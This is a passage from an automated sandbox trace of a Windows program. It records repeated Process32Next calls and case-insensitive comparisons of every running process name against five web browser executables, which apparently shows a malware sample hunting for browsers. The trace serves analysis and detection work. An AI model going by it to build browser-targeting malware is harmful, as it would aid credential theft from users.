lpString2="chrome.exe") returned 1 [0184.283] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0184.283] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.283] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0184.283] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0184.283] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0184.283] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0184.283] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0184.283] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.283] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.284] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.284] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.284] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.284] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.284] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.284] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.285] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.285] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.285] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.286] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.286] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.286] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.287] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0184.287] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0184.287] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0184.287] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0184.287] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.287] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.287] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.287] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.288] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.288] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.288] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.288] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.288] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.288] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.288] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.288] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.288] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.288] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.289] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0184.289] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0184.289] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0184.289] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0184.289] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.289] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.289] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0184.289] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0184.289] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0184.289] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0184.289] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.289] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0184.290] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0184.290] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0184.290] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0184.290] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0184.290] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.290] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.290] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.290] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0184.290] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0184.290] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0184.290] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.291] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0184.291] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0184.291] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0184.291] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0184.291] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0184.291] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.291] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0184.292] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0184.292] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0184.292] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0184.292] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0184.292] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.292] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0184.292] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0184.292] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0184.292] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0184.292] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0184.292] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.292] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0184.293] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0184.293] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0184.293] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0184.293] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0184.293] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.293] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0184.293] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0184.293] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0184.293] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0184.293] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0184.293] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.294] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0184.294] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0184.294] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0184.294] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0184.294] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0184.294] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.294] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0184.295] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0184.295] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0184.295] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0184.295] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0184.295] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.295] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0184.295] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0184.295] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0184.295] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0184.295] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0184.295] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.295] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0184.296] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0184.296] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0184.296] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0184.296] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0184.296] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.296] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0184.296] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0184.296] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0184.296] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0184.296] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0184.296] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.296] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0184.297] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0184.297] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0184.297] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0184.297] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0184.297] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.297] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0184.297] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0184.297] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0184.298] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0184.298] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0184.298] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.298] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0184.298] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0184.298] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0184.298] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0184.298] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0184.298] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.298] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0184.299] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0184.299] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0184.299] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0184.299] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0184.299] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.299] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0184.299] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0184.299] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0184.299] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0184.299] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0184.299] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.299] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0184.300] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0184.300] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0184.300] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0184.300] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0184.300] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.300] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0184.300] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0184.300] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0184.300] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0184.300] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0184.300] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.300] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0184.301] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0184.301] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0184.301] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0184.301] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0184.301] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.301] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0184.301] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0184.302] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0184.302] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0184.302] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0184.302] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.302] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0184.302] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0184.302] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0184.302] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0184.302] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0184.302] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.302] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0184.303] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0184.303] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0184.303] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0184.303] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0184.303] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.303] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0184.303] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0184.303] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0184.303] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0184.303] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0184.303] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.303] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.304] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0184.304] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0184.304] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0184.304] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0184.304] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.304] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, 